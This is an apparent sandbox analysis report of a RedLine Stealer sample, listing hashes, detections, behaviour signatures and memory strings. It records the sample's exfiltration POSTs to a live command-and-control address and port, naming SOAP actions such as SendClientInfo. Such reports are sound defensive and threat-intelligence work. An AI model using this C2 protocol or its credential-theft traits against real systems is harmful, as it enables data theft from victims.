
Analysis Report SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.25862

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.25862 (renamed file extension from 25862 to exe)
Analysis ID: 356847
MD5: a6602f490e70a0c9846906944c01b1ba
SHA1: 3864724e9136d3090cd2e7afa5ae4a348e07e0e4
SHA256: 1733a30d0e7acb953730092047086555a39f5cb2ee2549021e253cbdc931fb91
Tags: RedLineStealer

Detection

RedLine
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected RedLine Stealer
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000001.00000002.270171901.0000000002363000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.23a405e.4.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
1.2.SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.2310000.1.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe | Avira: detected
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe | Virustotal: Detection: 74%
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe | Metadefender: Detection: 27%
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe | ReversingLabs: Detection: 75%
Machine Learning detection for sample
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe | Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, RELOCS_STRIPPED
Binary contains paths to debug symbols
Source: Binary string: _.pdb source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmp

Networking:

Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 3214
Source: unknown | Network traffic detected: HTTP traffic on port 3214 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 3214
Source: unknown | Network traffic detected: HTTP traffic on port 3214 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 3214
Source: unknown | Network traffic detected: HTTP traffic on port 3214 -> 49728
Source: global traffic | TCP traffic: 192.168.2.3:49718 -> 45.14.13.58:3214
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"Host: 45.14.13.58:3214Content-Length: 136Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/SendClientInfo"Host: 45.14.13.58:3214Content-Length: 1109278Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetTasks"Host: 45.14.13.58:3214Content-Length: 1083264Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: Joe Sandbox View | IP Address: 192.0.47.59
Source: unknown | TCP traffic detected without corresponding DNS query: 45.14.13.58
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp | String found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: unknown | DNS traffic detected: queries for: api.ip.sb
Source: unknown | HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"Host: 45.14.13.58:3214Content-Length: 136Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp | String found in binary or memory: http://45.14.13.58:3214
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp | String found in binary or memory: http://45.14.13.58:3214/
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp | String found in binary or memory: http://45.14.13.58:32144
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270752515.0000000002796000.00000004.00000001.sdmp | String found in binary or memory: http://api.ip.sb
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270752515.0000000002796000.00000004.00000001.sdmp | String found in binary or memory: http://api.ip.sb.cdn.cloudflare.net
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp | String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp | String found in binary or memory: http://bot.whatismyipaddress.com/
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275067190.00000000058AB000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275112004.00000000058E5000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275067190.00000000058AB000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275112004.00000000058E5000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.dig
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275067190.00000000058AB000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp | String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp | String found in binary or memory: http://forms.rea
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp | String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp | String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp | String found in binary or memory: http://go.micros
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.268740526.0000000008713000.00000004.00000001.sdmp | String found in binary or memory: http://ns.ado/1
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.256274496.0000000008701000.00000004.00000001.sdmp | String found in binary or memory: http://ns.ado/1o
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.268740526.0000000008713000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.c/g
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.256274496.0000000008701000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.c/go
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.268740526.0000000008713000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.cobj
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.256274496.0000000008701000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.cobjo
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275067190.00000000058AB000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275067190.00000000058AB000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.datacontract.org
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/CONTEXT.Models.Enums
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp | String found in binary or memory: http://service.r
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp | String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp | String found in binary or memory: http://support.a
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp | String found in binary or memory: http://support.apple.com/kb/HT203092
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/0
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/IRemotePanel/CompleteTask
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/IRemotePanel/CompleteTaskResponse
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettings
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/IRemotePanel/GetSettingsResponse
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/IRemotePanel/GetTasks
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/IRemotePanel/GetTasksResponse
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/IRemotePanel/SendClientInfo
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp | String found in binary or memory: http://tempuri.org/IRemotePanel/SendClientInfoResponse
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp | String found in binary or memory: http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoipsecuritywaves-exchange
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp | String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp | String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp | String found in binary or memory: https://api.ip.sb
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp | String found in binary or memory: https://api.ip.sb/geoip
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabt
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp | String found in binary or memory: https://get.adob
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp | String found in binary or memory: https://helpx.ad
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp | String found in binary or memory: https://icanhazip.com
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp | String found in binary or memory: https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp | String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp | String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.260994800.0000000008210000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.260994800.0000000008210000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmpString found in binary or memory: https://wtfismyip.com/text
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275067190.00000000058AB000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.269668764.000000000070A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00408C601_2_00408C60
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_0040DC111_2_0040DC11
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00407C3F1_2_00407C3F
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00418CCC1_2_00418CCC
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00406CA01_2_00406CA0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004028B01_2_004028B0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_0041A4BE1_2_0041A4BE
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004182441_2_00418244
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004016501_2_00401650
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00402F201_2_00402F20
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004193C41_2_004193C4
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004187881_2_00418788
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00402F891_2_00402F89
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_00402B901_2_00402B90
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004073A01_2_004073A0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_024F16381_2_024F1638
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_024FC9D01_2_024FC9D0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_024FF2E01_2_024FF2E0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_051008E31_2_051008E3
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: String function: 0040E1D8 appears 44 times
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.278243802.00000000077B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCloisters.exe4 vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.206914545.0000000000789000.00000004.00000001.sdmpBinary or memory string: OriginalFilename_.dll4 vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275691984.0000000005D50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
